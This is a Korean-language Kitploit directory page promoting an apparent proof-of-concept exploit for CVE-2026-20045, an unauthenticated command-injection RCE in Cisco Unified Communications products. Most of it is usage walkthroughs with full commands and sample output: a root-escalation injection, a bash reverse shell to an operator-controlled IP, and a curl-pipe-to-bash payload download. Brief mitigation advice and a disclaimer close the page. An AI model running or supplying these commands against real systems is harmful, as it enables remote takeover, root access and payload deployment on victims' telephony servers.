Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Ashwesker-CVE-2026-20045 — # CVE-2026-20045 개념 증명 익스플로잇 Cisco Unified Communications 제품군의 치명적인 인증되지 않은 RCE 취약점으로, 루트 권한 상승과 함께 명령어 주입 및 리버스 셸을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

# CVE-2026-20045 개념 증명 익스플로잇 Cisco Unified Communications 제품군의 치명적인 인증되지 않은 RCE 취약점으로, 루트 권한 상승과 함께 명령어 주입 및 리버스 셸을 가능하게 합니다.

저장소 보기
637개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2026-20045 — 제로데이 분석 🚨

Cisco AsyncOS 0-Day Vulnerability

🧨 개요

여러 Cisco Unified Communications 제품에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점입니다. 패치가 배포되기 전에 실제 환경에서 적극적으로 악용되었습니다.


🔥 위험한 이유

  • 🚫 인증 불필요
  • 🖥️ 원격 코드 실행
  • 👑 루트 수준 액세스 가능
  • 🌍 실제 악용 사례 확인됨

이는 공격자가 영향을 받는 시스템을 원격으로 완전히 장악할 수 있음을 의미합니다.


🚨 CVE-2026-20045.py 사용 예시

PoC 스크립트 실행을 위한 사용 예시가 포함된 정리된 가이드입니다. 취약한 Cisco Unified Communications 대상(패치되지 않은 웹 인터페이스 노출)에서 익스플로잇이 성공할 경우 터미널에 정확히 표시되는 내용을 포함합니다. 가독성을 위해 이모지, 색상 코드 블록(markdown), 구조화된 섹션을 추가했습니다. 😎

1. 기본 시스템 정보 테스트

사용자 ID, 사용자 이름, 시스템 세부 정보를 가져오는 간단한 명령을 실행합니다.

명령어:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

성공 시 표시되는 내용 (성공 출력):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Initial command: id && whoami && uname -a  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  

[+] Possible command output:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 핵심 신호: 녹색 [+] 표시, HTTP 200 상태, 출력 블록의 명령 결과. 출력이 없어도 상태가 200이면 조용히 성공한 것입니다!

2. 리버스 셸 설정

사용자 머신으로 대화형 셸을 생성합니다. 먼저 리스너를 시작하세요: nc -lvnp 4444.

명령어:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

성공 시 표시되는 내용 (스크립트 터미널):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

리스너(nc) 터미널에 표시되는 내용:

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 핵심 신호: 스크립트에 성공 메시지 표시; 리스너에 즉시 루트 셸 프롬프트 수신. 여기에 명령을 입력하여 상호작용하세요!

3. 파일 다운로드 및 실행 (예: 커스텀 페이로드)

서버에서 스크립트를 다운로드하여 실행합니다.

명령어:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

성공 시 표시되는 내용 (성공 출력):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

📥 핵심 신호: 200 상태 코드; 대상(예: 로그/파일 확인) 또는 서버(다운로드 로그)에서 확인. 페이로드가 조용하면 직접 출력이 없습니다.

💡 프로 팁:

  • 네트워크 권한이 필요하면 sudo로 실행하세요.
  • HTTPS 대상을 사용하세요; 스크립트는 자체 서명 인증서를 처리합니다.
  • 실패하면(예: 404/403), 다른 경로를 시도하거나 대상이 패치되었는지 확인하세요.
  • 항상 윤리적으로 테스트하세요! 😈

🧩 영향을 받는 제품

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 근본 원인

HTTP 관리 인터페이스에서 사용자 입력 검증이 부적절하여 명령 주입이 발생하고, 이로 인해 원격 코드 실행이 가능해집니다.


📊 심각도

  • CVSS 점수: 8.2 (높음)
  • 비즈니스 영향: 치명적

🛡️ 완화 및 방어

  • ⚡ Cisco 패치를 즉시 적용하세요
  • 🔒 관리 인터페이스에 대한 액세스를 제한하세요
  • 🌐 시스템을 인터넷에 직접 노출하지 마세요
  • 👀 의심스러운 HTTP 활동에 대한 로그를 모니터링하세요
  • 🏛️ 해당되는 경우 정부 취약점 해결 지침을 따르세요

🔒 면책 조항:

모든 PoC 코드는 승인된 시스템에서 윤리적, 교육적 목적으로만 사용됩니다. 무단 악용은 불법이며, 오용에 대한 책임은 지지 않습니다. 😈

도구 다운로드